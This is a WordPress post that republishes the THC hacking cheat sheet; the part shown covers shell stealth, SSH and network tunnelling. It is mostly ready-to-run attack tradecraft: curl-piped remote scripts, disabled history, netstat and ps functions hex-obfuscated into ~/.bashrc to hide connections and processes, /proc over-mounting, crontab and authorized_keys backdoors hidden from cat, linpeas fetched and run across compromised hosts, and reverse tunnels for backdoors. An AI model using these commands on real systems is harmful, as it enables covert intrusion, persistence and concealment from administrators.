{"id":213,"date":"2025-06-08T15:55:48","date_gmt":"2025-06-08T07:55:48","guid":{"rendered":"https:\/\/wp.imesl.eu.org\/?p=213"},"modified":"2025-06-08T15:57:55","modified_gmt":"2025-06-08T07:57:55","slug":"thc-tips-chinese","status":"publish","type":"post","link":"https:\/\/wp.imesl.eu.org\/?p=213","title":{"rendered":"THC-tips Chinese"},"content":{"rendered":"

THC’s favourite Tips, Tricks & Hacks (Cheat Sheet)<\/h1>\n

https:\/\/thc.org\/tips<\/a> <\/p>\n

A collection of our favourite tricks. Many of those tricks are not from us. We merely collect them.<\/p>\n

We show the tricks ‘as is’ without any explanation why they work. You need to know Linux to understand how and why they work.<\/p>\n

Got tricks? Join us https:\/\/thc.org\/ops<\/a><\/p>\n

    \n
  1. Bash<\/a>\n
      \n
    1. Set up a Hack Shell<\/a><\/li>\n
    2. Hide your commands<\/a><\/li>\n
    3. Hide your command line options<\/a><\/li>\n
    4. Hide a network connection<\/a><\/li>\n
    5. Hide a process as user<\/a><\/li>\n
    6. Hide a process as root<\/a><\/li>\n
    7. Hide scripts<\/a><\/li>\n
    8. Hide from cat<\/a><\/li>\n
    9. Execute in parallel with separate logfiles<\/a><\/li>\n<\/ol><\/li>\n
    10. SSH<\/a>\n
        \n
      1. Almost invisible SSH<\/a><\/li>\n
      2. Multiple shells via 1 SSH\/TCP connection<\/a><\/li>\n
      3. SSH tunnel<\/a><\/li>\n
      4. SSH socks5 tunnel<\/a><\/li>\n
      5. SSH to NATed host<\/a><\/li>\n
      6. SSH pivot via ProxyJump<\/a><\/li>\n
      7. SSHD as user<\/a><\/li>\n<\/ol><\/li>\n
      8. Network<\/a>\n
          \n
        1. Discover hosts<\/a><\/li>\n
        2. Tcpdump<\/a><\/li>\n
        3. Tunnel and forwarding<\/a>\n
            \n
          1. Raw TCP reverse ports<\/a><\/li>\n
          2. HTTPS reverse forwards<\/a><\/li>\n
          3. Bouncing traffic with iptables<\/a><\/li>\n
          4. Ghost IP \/ IP Spoofing<\/a><\/li>\n
          5. Various<\/a><\/li>\n<\/ol><\/li>\n
          6. Use any tool via Socks Proxy<\/a><\/li>\n
          7. Find your public IP address<\/a><\/li>\n
          8. Check reachability from around the world<\/a><\/li>\n
          9. Check\/Scan Open Ports<\/a><\/li>\n
          10. Crack Passwords hashes<\/a><\/li>\n
          11. Brute Force Passwords \/ Keys<\/a><\/li>\n<\/ol><\/li>\n
          12. Data Upload\/Download\/Exfil<\/a>\n
              \n
            1. File Encoding\/Decoding<\/a><\/li>\n
            2. File transfer using cut & paste<\/a><\/li>\n
            3. File transfer using tmux<\/a><\/li>\n
            4. File transfer using screen<\/a><\/li>\n
            5. File transfer using gs-netcat and sftp<\/a><\/li>\n
            6. File transfer using HTTP<\/a><\/li>\n
            7. File download without curl<\/a><\/li>\n
            8. File transfer using rsync<\/a><\/li>\n
            9. File transfer to public dump sites<\/a> <\/li>\n
            10. File transfer using WebDAV<\/a><\/li>\n
            11. File transfer to Telegram<\/a> <\/li>\n<\/ol><\/li>\n
            12. Reverse Shell \/ Dumb Shell<\/a>\n
                \n
              1. Reverse Shells<\/a>\n
                  \n
                1. with gs-netcat (encrypted)<\/a><\/li>\n
                2. with Bash<\/a><\/li>\n
                3. with cURL (encrypted)<\/a><\/li>\n
                4. with cURL (cleartext)<\/a><\/li>\n
                5. with OpenSSL (encrypted)<\/a><\/li>\n
                6. with remote.moe (encrypted)<\/a><\/li>\n
                7. without \/dev\/tcp<\/a><\/li>\n
                8. with Python<\/a><\/li>\n
                9. with Perl<\/a><\/li>\n
                10. with PHP<\/a><\/li>\n<\/ol><\/li>\n
                11. Upgrading the dumb shell<\/a>\n
                    \n
                  1. Upgrade a reverse shell to a pty shell<\/a><\/li>\n
                  2. Upgrade a reverse shell to a fully interactive shell<\/a><\/li>\n
                  3. Reverse shell with socat (fully interactive)<\/a><\/li>\n<\/ol><\/li>\n<\/ol><\/li>\n
                  4. Backdoors<\/a>\n
                      \n
                    1. gs-netcat<\/a><\/li>\n
                    2. sshx.io<\/a><\/li>\n
                    3. authorized_keys<\/a><\/li>\n
                    4. Remote access an entire network<\/a><\/li>\n
                    5. Smallest PHP backdoor<\/a><\/li>\n
                    6. Smallest reverse DNS-tunnel backdoor<\/a><\/li>\n
                    7. Local Root backdoor<\/a><\/li>\n
                    8. Self-extracting implant<\/a><\/li>\n<\/ol><\/li>\n
                    9. Host Recon<\/a><\/li>\n
                    10. Shell Hacks<\/a>\n
                        \n
                      1. Shred files (secure delete)<\/a><\/li>\n
                      2. Restore the date of a file<\/a><\/li>\n
                      3. Clean logfile<\/a><\/li>\n
                      4. Hide files from a User without root privileges<\/a><\/li>\n
                      5. Make a file immutable<\/a><\/li>\n
                      6. Change user without sudo\/su<\/a><\/li>\n
                      7. Obfuscate and crypt payload<\/a><\/li>\n
                      8. Deploying a backdoor without touching the file-system<\/a><\/li>\n<\/ol><\/li>\n
                      9. Crypto<\/a>\n
                          \n
                        1. Generate quick random Password<\/a><\/li>\n
                        2. Linux transportable encrypted filesystems<\/a>\n
                            \n
                          1. cryptsetup<\/a><\/li>\n
                          2. EncFS<\/a><\/li>\n<\/ol><\/li>\n
                          3. Encrypting a file<\/a><\/li>\n<\/ol><\/li>\n
                          4. Session sniffing and hijacking<\/a>\n
                              \n
                            1. Sniff a user’s SHELL session<\/a><\/li>\n
                            2. Sniff all SHELL sessions with dtrace<\/a><\/li>\n
                            3. Sniff all SHELL sessions with eBPF<\/a><\/li>\n
                            4. Sniff a user’s SSH or SSHD session with strace<\/a><\/li>\n
                            5. Sniff a user’s outgoing SSH session with a wrapper script<\/a><\/li>\n
                            6. Sniff a user’s outgoing SSH session with SSH-IT<\/a><\/li>\n
                            7. Hijack \/ Take-over a running SSH session<\/a><\/li>\n<\/ol><\/li>\n
                            8. VPN and Shells<\/a>\n
                                \n
                              1. Disposable Root Servers<\/a><\/li>\n
                              2. VPN\/VPS Providers<\/a><\/li>\n<\/ol><\/li>\n
                              3. OSINT Intelligence Gathering<\/a><\/li>\n
                              4. Miscellaneous<\/a>\n
                                  \n
                                1. Tools of the trade<\/a><\/li>\n
                                2. Cool Linux commands<\/a><\/li>\n
                                3. tmux Cheat Sheet<\/a><\/li>\n
                                4. Useful commands<\/a><\/li>\n<\/ol><\/li>\n
                                5. How to become a Hacker<\/a><\/li>\n
                                6. Other Sites<\/a><\/li>\n<\/ol>\n
                                  \n

                                  <\/a><\/p>\n

                                  1. Bash \/ Shell<\/h2>\n

                                  <\/a>\n1.i. Set up a Hack Shell (bash):<\/strong><\/p>\n

                                  Make BASH less noisy. Disables ~\/.bash_history<\/em> and many other things<\/a>.<\/p>\n

                                   source <(curl -SsfL https:\/\/thc.org\/hs)<\/code><\/pre>\n
                                  Alternative URL:<\/p>\n
                                   source <(curl -SsfL https:\/\/github.com\/hackerschoice\/hackshell\/raw\/main\/hackshell.sh)<\/code><\/pre>\n
                                  And if there is no curl\/wget, use surl<\/a> and (temporarily) installed curl with bin curl<\/code>.<\/p>\n
                                  source <(surl https:\/\/raw.githubusercontent.com\/hackerschoice\/hackshell\/main\/hackshell.sh)\n# Afterwards type `bin curl` to (temporarily) install curl (in memory).<\/code><\/pre>\n
                                  HackShell does much more but most importantly this:<\/p>\n
                                  unset HISTFILE\n[ -n "$BASH" ] && export HISTFILE="\/dev\/null"\nexport BASH_HISTORY="\/dev\/null"\nexport LANG=en_US.UTF-8\nlocale -a 2>\/dev\/null|grep -Fqim1 en_US.UTF || export LANG=en_US\nexport LESSHISTFILE=-\nexport REDISCLI_HISTFILE=\/dev\/null\nexport MYSQL_HISTFILE=\/dev\/null\nTMPDIR="\/tmp"\n[ -d "\/var\/tmp" ] && TMPDIR="\/var\/tmp"\n[ -d "\/dev\/shm" ] && TMPDIR="\/dev\/shm"\nexport TMPDIR\nexport PATH=".:${PATH}"\nif [[ "$SHELL" == *"zsh" ]]; then\n    PS1='%F{red}%n%f@%F{cyan}%m %F{magenta}%~ %(?.%F{green}.%F{red})%#%f '\nelse\n    PS1='\\[\\033[36m\\]\\u\\[\\033[m\\]@\\[\\033[32m\\]\\h:\\[\\033[33;1m\\]\\w\\[\\033[m\\]\\$ '\nfi\nalias wget='wget --no-hsts'\nalias vi="vi -i NONE"\nalias vim="vim -i NONE"\nalias screen="screen -ln"\n\nTERM=xterm reset -I\nstty cols 400 # paste this on its own before pasting the next line:\nresize &>\/dev\/null || { stty -echo;printf "\\e[18t"; read -t5 -rdt R;IFS=';' read -r -a a <<< "${R:-8;25;80}";[ "${a[1]}" -ge "${a[2]}" ] && { R="${a[1]}";a[1]="${a[2]}";a[2]="${R}";};stty sane rows "${a[1]}" cols "${a[2]}";}\n# stty sane rows 60 cols 160<\/code><\/pre>\n
                                  We use anew<\/code> a lot, and this is a quick workaround:<\/p>\n
                                  xanew() { awk 'hit[$0]==0 {hit[$0]=1; print $0}'; }\nwhich anew &>\/dev\/null || alias anew=xanew<\/code><\/pre>\n
                                  Bonus tip:\nAny command starting with a ” ” (space) will not get logged to history<\/a> either.<\/p>\n
                                  $  id<\/code><\/pre>\n
                                  <\/a>\n1.ii. Hide your command \/ Daemonzie your command<\/strong><\/p>\n
                                  This will hide the process name<\/em> only. Use zapper<\/a> to also hide the command line options.<\/p>\n
                                  (exec -a syslogd nmap -Pn -F -n --open -oG - 10.0.2.1\/24) # Note the brackets '(' and ')'<\/code><\/pre>\n
                                  Start a background ‘nmap’ hidden as ‘\/usr\/sbin\/sshd’:<\/p>\n
                                  (exec -a '\/usr\/sbin\/sshd' nmap -Pn -F -n --open -oG - 10.0.2.1\/24 &>nmap.log &)<\/code><\/pre>\n
                                  Start within a GNU screen<\/a>:<\/p>\n
                                  screen -dmS MyName nmap -Pn -F -n --open -oG - 10.0.2.1\/24\n### Attach back to the nmap process\nscreen -x MyName<\/code><\/pre>\n
                                  Alternatively, copy the binary to a new name:<\/p>\n
                                  cd \/dev\/shm\ncp "$(command -v nmap)" syslogd\nPATH=.:$PATH syslogd -Pn -F -n --open -oG - 10.0.2.1\/24<\/code><\/pre>\n
                                  or use bind-mount to (temporarily) let \/sbin\/init<\/em> point to \/dev\/shm\/nmap<\/em> instead:<\/p>\n
                                  mount -n --bind "$(command -v nmap)" \/sbin\/init\n# starting \/sbin\/init will instead execute nmap\n(\/sbin\/init -Pn -f -n --open -oG - 10.0.2.1\/24 &>nmap.log &)<\/code><\/pre>\n
                                  <\/a>\n1.iii. Hide your command line options<\/strong><\/p>\n
                                  Use zapper<\/a>:<\/p>\n
                                  curl -fL -o zapper https:\/\/github.com\/hackerschoice\/zapper\/releases\/latest\/download\/zapper-linux-$(uname -m) && \\\nchmod 755 zapper<\/code><\/pre>\n
                                  # Start Nmap but zap all options and show it as 'klog' in the process list:\n.\/zapper -a klog nmap -Pn -F -n --open -oG - 10.0.0.1\/24\n# Started as a daemon and sshd-style name:\n(.\/zapper -a 'sshd: root@pts\/0' nmap -Pn -F -n --open -oG - 10.0.0.1\/24 &>nmap.log &)\n# Replace the existing shell with tmux (with 'exec').\n# Then start and hide tmux and all further processes - as some kernel process:\nexec .\/zapper -f -a'[kworker\/1:0-rcu_gp]' tmux<\/code><\/pre>\n
                                  <\/a>\n1.iv. Hide a Network Connection<\/strong><\/p>\n
                                  The trick is to hijack netstat<\/code> and use grep to filter out our connection. This example filters any connection on port 31337 or<\/em> ip 1.2.3.4. The same should be done for ss<\/code> (a netstat alternative).<\/p>\n
                                  Method 1 – Hiding a connection with bash-function in ~\/.bashrc<\/strong><\/p>\n
                                  Cut & paste this to add the line to ~\/.bashrc<\/p>\n
                                  echo 'netstat(){ command netstat "$@" | grep -Fv -e :31337 -e 1.2.3.4; }' >>~\/.bashrc \\\n&& touch -r \/etc\/passwd ~\/.bashrc<\/code><\/pre>\n
                                  Or cut & paste this for an obfuscated entry to ~\/.bashrc:<\/p>\n
                                  X='netstat(){ command netstat "$@" | grep -Fv -e :31337 -e 1.2.3.4; }'\necho "eval \\$(echo $(echo "$X" | xxd -ps -c1024)|xxd -r -ps) #Initialize PRNG" >>~\/.bashrc \\\n&& touch -r \/etc\/passwd ~\/.bashrc<\/code><\/pre>\n
                                  The obfuscated entry to ~\/.bashrc will look like this:<\/p>\n
                                  eval $(echo 6e65747374617428297b20636f6d6d616e64206e6574737461742022244022207c2067726570202d4676202d65203a3331333337202d6520312e322e332e343b207d0a|xxd -r -ps) #Initialize PRNG<\/code><\/pre>\n
                                  Method 2 – Hiding a connection with a binary in $PATH<\/strong><\/p>\n
                                  Create a fake netstat binary in \/usr\/local\/sbin. On a default Debian (and most Linux) the PATH variables (echo $PATH<\/code>) lists \/usr\/local\/sbin before<\/em> \/usr\/bin. This means that our hijacking binary \/usr\/local\/sbin\/netstat will be executed instead of \/usr\/bin\/netstat.<\/p>\n
                                  echo '#! \/bin\/bash\nexec \/usr\/bin\/netstat "$@" | grep -Fv -e :22 -e 1.2.3.4' >\/usr\/local\/sbin\/netstat \\\n&& chmod 755 \/usr\/local\/sbin\/netstat \\\n&& touch -r \/usr\/bin\/netstat \/usr\/local\/sbin\/netstat<\/code><\/pre>\n
                                  (thank you iamaskid)<\/em><\/p>\n
                                  <\/a>\n1.v. Hide a process as user<\/strong><\/p>\n
                                  Continuing from “Hiding a connection” the same technique can be used to hide a process. This example hides the nmap process and also takes care that our grep<\/code> does not show up in the process list by renaming it to GREP:<\/p>\n
                                  echo 'ps(){ command ps "$@" | exec -a GREP grep -Fv -e nmap  -e GREP; }' >>~\/.bashrc \\\n&& touch -r \/etc\/passwd ~\/.bashrc<\/code><\/pre>\n
                                  <\/a>\n1.vi. Hide a process as root<\/strong><\/p>\n
                                  This requires root privileges and is an old Linux trick by over-mounting \/proc\/ with a useless directory:<\/p>\n
                                  hide() {\n    [[ -L \/etc\/mtab ]] && { cp \/etc\/mtab \/etc\/mtab.bak; mv \/etc\/mtab.bak \/etc\/mtab; }\n    _pid=${1:-$$}\n    [[ $_pid =~ ^[0-9]+$ ]] && { mount -n --bind \/dev\/shm \/proc\/$_pid && echo "[THC] PID $_pid is now hidden"; return; }\n    local _argstr\n    for _x in "${@:2}"; do _argstr+=" '${_x\/\/\\'\/\\'\\"\\'\\"\\'}'"; done\n    [[ $(bash -c "ps -o stat= -p \\$\\$") =~ \\+ ]] || exec bash -c "mount -n --bind \/dev\/shm \/proc\/\\$\\$; exec \\"$1\\" $_argstr"\n    bash -c "mount -n --bind \/dev\/shm \/proc\/\\$\\$; exec \\"$1\\" $_argstr"\n}<\/code><\/pre>\n
                                  To hide a command use:<\/p>\n
                                  hide                                 # Hides the current shell\/PID\nhide 31337                           # Hides process with pid 31337\nhide sleep 1234                      # Hides 'sleep 1234'\nhide nohup sleep 1234 &>\/dev\/null &  # Starts and hides 'sleep 1234' as a background process<\/code><\/pre>\n
                                  (thanks to druichi<\/em> for improving this)<\/p>\n
                                  <\/a>\n1.vii. Hide shell scripts<\/strong><\/p>\n
                                  Above we discussed how to obfuscate a line in ~\/.bashrc. An often used trick is to use source<\/code> instead. The source command can be shortened to .<\/code> (yes, a dot) and<\/em> it also searches through the $PATH variable to find the file to load.<\/p>\n
                                  In this example our script prng<\/code> contains all of our shell functions from above. Those functions hide the nmap<\/code> process and the network connection. Last we add . prng<\/code> into the systemwide rc file. This will load prng<\/code> when the user (and root) logs in:<\/p>\n
                                  echo -e 'netstat(){ command netstat "$@" | grep -Fv -e :31337 -e 1.2.3.4; }\nps(){ command ps "$@" | exec -a GREP grep -Fv -e nmap  -e GREP; }' >\/usr\/bin\/prng \\\n&& echo ". prng #Initialize Pseudo Random Number Generator" >>\/etc\/bash.bashrc \\\n&& touch -r \/etc\/ld.so.conf \/usr\/bin\/prng \/etc\/bash.bashrc<\/code><\/pre>\n
                                  (The same works for lsof<\/code>, ss<\/code> and ls<\/code>)<\/p>\n
                                  <\/a>\n1.viii. Hide from cat<\/strong><\/p>\n
                                  ANSI escape characters or a simple \\r<\/code> (carriage return<\/a>) can be used to hide from cat<\/code> and others.<\/p>\n
                                  Hide the last command (example: id<\/code>) in ~\/.bashrc<\/code>:<\/p>\n
                                  echo -e "id #\\\\033[2K\\\\033[1A" >>~\/.bashrc\n### The ANSI escape sequence \\\\033[2K erases the line. The next sequence \\\\033[1A\n### moves the cursor 1 line up.\n### The '#' after the command 'id' is a comment and is needed so that bash still\n### executes the 'id' but ignores the two ANSI escape sequences.<\/code><\/pre>\n
                                  Add a hidden crontab line:<\/p>\n
                                  (crontab -l; echo -e "0 2 * * * { id; date;} 2>\/dev\/null >\/tmp\/.thc-was-here #\\\\033[2K\\\\033[1A") | crontab<\/code><\/pre>\n
                                  Adding a \\r<\/code> (carriage return) goes a long way to hide your ssh key from cat<\/code>:<\/p>\n
                                  echo "ssh-ed25519 AAAAOurPublicKeyHere....blah x@y"$'\\r'"$(<authorized_keys)" >authorized_keys\n### This adds our key as the first key and 'cat authorized_keys' won't show\n### it. The $'\\r' is a bash special to create a \\r (carriage return).<\/code><\/pre>\n
                                  <\/a>\n**1.ix. Execute in parallel with separate logfiles***<\/p>\n
                                  Scan 20 hosts in parallel and log each result to a separate log file:<\/p>\n
                                  # hosts.txt contains a long list of hostnames or ip-addresses\n# (Use -sCV for more verbose version)\ncat hosts.txt | parallel -j20 'exec nmap -n -Pn -sV -F --open -oG - {} >nmap_{}.txt'<\/code><\/pre>\n
                                  Note: The example uses exec<\/code> to replace the underlying shell with the last process (nmap, gsexec). It’s optional but reduces the number of running shell binaries.<\/p>\n
                                  Execute Linpeas<\/a> on all gsocket<\/a> hosts using 40 workers:<\/p>\n
                                  # secrets.txt contains a long list of gsocket-secrets for each remote server.\ncat secrets.txt | parallel -j40 'mkdir host_{}; exec gsexec {} "curl -fsSL https:\/\/github.com\/carlospolop\/PEASS-ng\/releases\/latest\/download\/linpeas.sh | sh" >host_{}\/linpeas.log 2>host_{}\/linpeas.err'<\/code><\/pre>\n
                                  Note: xargs -P20 -I{}<\/code> is another good way but it cannot log each output into a separate file.  <\/p>\n
                                  \n
                                  <\/a><\/p>\n
                                  2. SSH<\/h2>\n
                                  <\/a>\n2.i. Almost invisible SSH<\/strong><\/p>\n
                                  Stops you from showing up in w<\/em> or who<\/em> command and stops logging the host to ~\/.ssh\/known_hosts<\/em>.<\/p>\n
                                  ssh -o UserKnownHostsFile=\/dev\/null -T user@server.org "bash -i"<\/code><\/pre>\n
                                  Go full comfort with PTY and colors: xssh user@server.org<\/code>:<\/p>\n
                                  ### Cut & Paste the following to your shell, then execute\n### xssh user@server.org\nxssh() {\n    local ttyp="$(stty -g)"\n    echo -e "\\e[0;35mTHC says: pimp up your prompt: Cut & Paste the following into your remote shell:\\e[0;36m"\n    echo -e '\\e[0;36msource <(curl -SsfL https:\/\/github.com\/hackerschoice\/hackshell\/raw\/main\/hackshell.sh)\\e[0m'\n    echo -e "\\e[2m# or: \\e[0;36m\\e[2mPS1='"'\\[\\\\033[36m\\]\\\\u\\[\\\\033[m\\]@\\[\\\\033[32m\\]\\\\h:\\[\\\\033[33;1m\\]\\\\w\\[\\\\033[m\\]\\\\$ '"'\\e[0m"\n    stty raw -echo icrnl opost\n    [[ $(ssh -V 2>&1) == OpenSSH_[67]* ]] && a="no"\n    ssh -oConnectTimeout=5 -oUserKnownHostsFile=\/dev\/null -oStrictHostKeyChecking="${a:-accept-new}" -T \\\n        "$@" \\\n        "unset SSH_CLIENT SSH_CONNECTION; LESSHISTFILE=- MYSQL_HISTFILE=\/dev\/null TERM=xterm-256color HISTFILE=\/dev\/null BASH_HISTORY=\/dev\/null exec -a [uid] script -qc 'source <(resize 2>\/dev\/null); exec -a [uid] bash -i' \/dev\/null"\n    stty "${ttyp}"\n}<\/code><\/pre>\n
                                  (See Hackshell<\/a>)<\/p>\n
                                  <\/a>\n2.ii Multiple shells via 1 SSH\/TCP connection<\/strong><\/p>\n
                                  Have one TCP connection to the target and allow multiple users to piggyback on the same TCP connection to open further shell sessions.<\/p>\n
                                  Create a Master Connection:<\/p>\n
                                  ssh -M -S .sshmux user@server.org<\/code><\/pre>\n
                                  Create further shell-sessions using the same (single) Master-TCP connection from above (no password\/auth needed):<\/p>\n
                                  ssh -S .sshmux NONE\n#ssh -S .sshmux NONE ls -al\n#scp -o "ControlPath=.sshmux" NONE:\/etc\/passwd .<\/code><\/pre>\n
                                  Can be combined with xssh<\/a> to hide from utmp.<\/p>\n
                                  <\/a>\n2.iii SSH tunnel<\/strong><\/p>\n
                                  We use this all the time to circumvent local firewalls and IP filtering:<\/p>\n
                                  ssh -g -L31337:1.2.3.4:80 user@server.org<\/code><\/pre>\n
                                  You or anyone else can now connect to your computer on port 31337 and get tunneled to 1.2.3.4 port 80 and appear with the source IP of ‘server.org’. An alternative and without the need for a server is to use gs-netcat<\/a>.<\/p>\n
                                  Clever hackers use the keyboard combination ~C<\/code> to dynamically create these tunnels without having to reconnect the SSH. (thanks MessedeDegod).<\/p>\n
                                  We use this to give access to a friend to an internal machine that is not on the public Internet:<\/p>\n
                                  ssh -o ExitOnForwardFailure=yes -g -R31338:192.168.0.5:80 user@server.org<\/code><\/pre>\n
                                  Anyone connecting to server.org:31338 will get tunneled to 192.168.0.5 on port 80 via your computer. An alternative and without the need for a server is to use gs-netcat<\/a>.<\/p>\n
                                  <\/a>\n2.iv SSH socks4\/5 tunnel<\/strong><\/p>\n
                                  OpenSSH 7.6 adds socks support for dynamic forwarding. Example: Tunnel all your browser traffic through your server.<\/p>\n
                                  ssh -D 1080 user@server.org<\/code><\/pre>\n
                                  Now configure your browser to use SOCKS with 127.0.0.1:1080. All your traffic is now tunneled through server.org<\/em> and will appear with the source IP of server.org<\/em>. An alternative and without the need for a server is to use gs-netcat<\/a>.<\/p>\n
                                  This is the reverse of the above example. It give others access to your local<\/em> network or let others use your computer as a tunnel end-point.<\/p>\n
                                  ssh -g -R 1080 user@server.org<\/code><\/pre>\n
                                  The others configuring server.org:1080 as their SOCKS4\/5 proxy. They can now connect to any<\/em> computer on any port<\/em> that your computer has access to. This includes access to computers behind your firewall that are on your local network. An alternative and without the need for a server is to use gs-netcat<\/a>.<\/p>\n
                                  <\/a>\n2.v SSH to a host behind NAT<\/strong><\/p>\n
                                  ssh-j.com<\/a> provides a great relay service: To access a host behind NAT\/Firewall (via SSH).<\/p>\n
                                  On the host behind NAT: Create a reverse SSH tunnel to ssh-j.com<\/a> like so:<\/p>\n
                                  ## Cut & Paste on the host behind NAT.\nsshj()\n{\n   local pw\n   pw=${1,,}\n   [[ -z $pw ]] && { pw=$(head -c64 <\/dev\/urandom | base64 | tr -d -c a-z0-9); pw=${pw:0:12}; }\n   echo "Press Ctrl-C to stop this tunnel."\n   echo -e "To ssh to ${USER:-root}@${2:-127.0.0.1}:${3:-22} type: \\e[0;36mssh -J ${pw}@ssh-j.com ${USER:-root}@${pw}\\e[0m"\n   ssh -o StrictHostKeyChecking=accept-new -o ServerAliveInterval=30 -o ExitOnForwardFailure=yes ${pw}@ssh-j.com -N -R ${pw}:22:${2:-0}:${3:-22}\n}\n\nsshj                                 # Generates a random tunnel ID [e.g. 5dmxf27tl4kx] and keeps the tunnel connected\nsshj foobarblahblub                  # Creates tunnel to 127.0.0.1:22 with specific tunnel ID\nsshj foobarblahblub 192.168.0.1 2222 # Tunnel to host 192.168.0.1:2222 on the LAN<\/code><\/pre>\n
                                  Then use this command from anywhere else in the world to connect as ‘root’ to ‘foobarblahblub’ (the host behind the NAT):<\/p>\n
                                  ssh -J foobarblahblub@ssh-j.com root@foobarblahblub<\/code><\/pre>\n
                                  The ssh connection goes via ssh-j.com into the reverse tunnel to the host behind NAT. The traffic is end-2-end encrypted and ssh-j.com can not see the content.<\/p>\n
                                  <\/a>\n2.vi SSH pivoting to multiple servers<\/strong><\/p>\n
                                  SSH ProxyJump can save you a lot of time and hassle when working with remote servers. Let’s assume the scenario:  <\/p>\n
                                  Our workstation is $local-kali and we like to SSH into $target-host. There is no direct connection between our workstation and $target-host. Our workstation can only reach $C2. $C2 can reach $internal-jumphost (via internal eth1) and $internal-jumphost can reach the final $target-host via eth2.<\/p>\n
                                            $local-kali       -> $C2            -> $internal-jumphost    -> $target-host\neth0      192.168.8.160      10.25.237.119             \neth1                         192.168.5.130       192.168.5.135\neth2                                             172.16.2.120             172.16.2.121<\/code><\/pre>\n
                                  \n
                                  We do not execute ssh<\/code> on any computer but our trusted workstation – and neither shall you (ever).<\/p>\n<\/blockquote>\n
                                  That’s where ProxyJump helps: We can ‘jump’ via the two intermediary servers $C2 and $internal-jumphost (without spawning a shell on those servers). The ssh-connection is end-2-end encrypted between our $local-kali and $target-host and no password or key is exposed to $C2 or $internal-jumphost.<\/p>\n
                                  ## if we want to SSH to $target-host:\nkali@local-kali$ ssh -J c2@10.25.237.119,jumpuser@192.168.5.135 target@172.16.2.121\n\n## if we want to SSH to just $internal-jumphost:\nkali@local-kali$ ssh -J c2@10.25.237.119 jumpuser@192.168.5.135<\/code><\/pre>\n
                                  \n
                                  We use this as well to hide our IP address when logging into servers. <\/p>\n<\/blockquote>\n
                                  <\/a>\n2.vii SSHD as user land<\/strong><\/p>\n
                                  It is possible to start a SSHD server as a non-root user and use this to multiplex or forward TCP connection (without logging and when the systemwide SSHD forbids forwarding\/multiplexing) or as a quick exfil-dump-server that runs as non-root:<\/p>\n
                                  # On the server, as non-root user 'joe':\nmkdir -p ~\/.ssh 2>\/dev\/null\nssh-keygen -q -N "" -t ed25519 -f sshd_key\ncat sshd_key.pub >>~\/.ssh\/authorized_keys\ncat sshd_key\n$(command -v sshd) -f \/dev\/null -o HostKey=$(pwd)\/sshd_key -o GatewayPorts=yes -p 31337 # -Dvvv<\/code><\/pre>\n
                                  # On the client, copy the sshd_key from the server. Then login:\n# Example: Proxy connection via the server and reverse-forward 31339 to localhost:\nssh -D1080 -R31339:0:31339 -i sshd_key -p 31337 joe@1.2.3.4\n# curl -x socks5h:\/\/0 ipinfo.io<\/code><\/pre>\n
                                  SSF<\/a> is an alternative way to multiplex TCP over TLS.<\/p>\n
                                  \n
                                  <\/a><\/p>\n
                                  3. Network<\/h2>\n
                                  <\/a>\n3.i. Discover hosts<\/strong><\/p>\n
                                  ## ARP discover computers on the _LOCAL_ network only\nnmap -n -sn -PR -oG - 192.168.0.1\/24<\/code><\/pre>\n
                                  ### ICMP discover hosts\nnmap -n -sn -PI -oG - 192.168.0.1\/24<\/code><\/pre>\n
                                  ## ICMP discover hosts (local LAN) ROOT\n# NET="10.11.0"  # discover 10.11.0.1-10.11.0.254\nseq 1 254 | xargs -P20 -I{} ping -n -c3 -i0.2 -w1 -W200 "${NET:-192.168.0}.{}" | grep 'bytes from' | awk '{print $4" "$7;}' | sort -uV -k1,1<\/code><\/pre>\n
                                  \n
                                  <\/a>\n3.ii. tcpdump<\/strong><\/p>\n
                                  ## Monitor every new TCP connection\ntcpdump -np 'tcp[tcpflags] ^ (tcp-syn|tcp-ack) == 0'\n\n## Play a *bing*-noise for every new SSH connection\ntcpdump -nplq 'tcp[13] == 2 and dst port 22' | while read -r x; do echo "${x}"; echo -en \\\\a; done\n\n## Ascii output (for all large packets. Change to >40 if no TCP options are used).\ntcpdump -npAq -s0 'tcp and (ip[2:2] > 60)'<\/code><\/pre>\n
                                  \n
                                  <\/a>\n3.iii. Tunnel and forwarding<\/strong><\/p>\n
                                  ## Connect to SSL (using socat)\nsocat stdio openssl-connect:smtp.gmail.com:465\n\n## Connect to SSL (using openssl)\nopenssl s_client -connect smtp.gmail.com:465<\/code><\/pre>\n
                                  ## Bridge TCP to SSL\nsocat TCP-LISTEN:25,reuseaddr,fork  openssl-connect:smtp.gmail.com:465<\/code><\/pre>\n
                                  \n
                                  <\/a>\n3.iii.a Raw TCP reverse ports<\/strong><\/p>\n
                                  Useful for reverse backdoors that need a TCP Port on a PUBLIC IP Address:<\/p>\n
                                  Using segfault.net<\/a> (free):<\/p>\n
                                  # Request a random public TCP port:\ncurl sf\/port\necho "Your public IP:PORT is $(cat \/config\/self\/reverse_ip):$(cat \/config\/self\/reverse_port)"\nnc -vnlp $(cat \/config\/self\/reverse_port)<\/code><\/pre>\n
                                  Using bore.pub<\/a> (free):<\/p>\n
                                  # Forward a random public TCP port to localhost:31337\nbore local 31337 --to bore.pub<\/code><\/pre>\n
                                  using serveo.net<\/a> (free):<\/p>\n
                                  # Forward a random public TCP port to localhost:31337\nssh -R 0:localhost:31337 tcp@serveo.net<\/code><\/pre>\n
                                  using pinggy.io<\/a> (60 mins free):<\/p>\n
                                  ssh -p 443 -R 0:localhost:31337 tcp@a.pinggy.io<\/code><\/pre>\n
                                  See also remote.moe<\/a> (free) to forward raw TCP from the target to your workstation or playit<\/a> (free) or ngrok<\/a> (paid subscription) to forward a raw public TCP port.<\/p>\n
                                  Other free services are limited to forward HTTPS only (not raw TCP). Some tricks below show how to tunnel raw TCP over HTTPS forwards (using websockets).<\/p>\n
                                  \n
                                  <\/a>\n3.iii.b HTTPS reverse tunnels<\/strong><\/p>\n
                                  On the server, use any one of these three HTTPS tunneling services:  <\/p>\n
                                  ### Reverse HTTPS tunnel to forward public HTTPS requests to this server's port 8080:\nssh -R80:0:8080 -o StrictHostKeyChecking=accept-new nokey@localhost.run\n### Or using remote.moe\nssh -R80:0:8080 -o StrictHostKeyChecking=accept-new nokey@remote.moe\n### Or using cloudflared\ncurl -fL -o cloudflared https:\/\/github.com\/cloudflare\/cloudflared\/releases\/latest\/download\/cloudflared-linux-amd64\nchmod 755 cloudflared\ncloudflared tunnel --url http:\/\/localhost:8080 --no-autoupdate<\/code><\/pre>\n
                                  Either service will generate a new temporary HTTPS-URL for you to use.  <\/p>\n
                                  Then, use websocat<\/a> or Gost<\/a> on both ends to tunnel raw TCP over the HTTPS URL:<\/p>\n
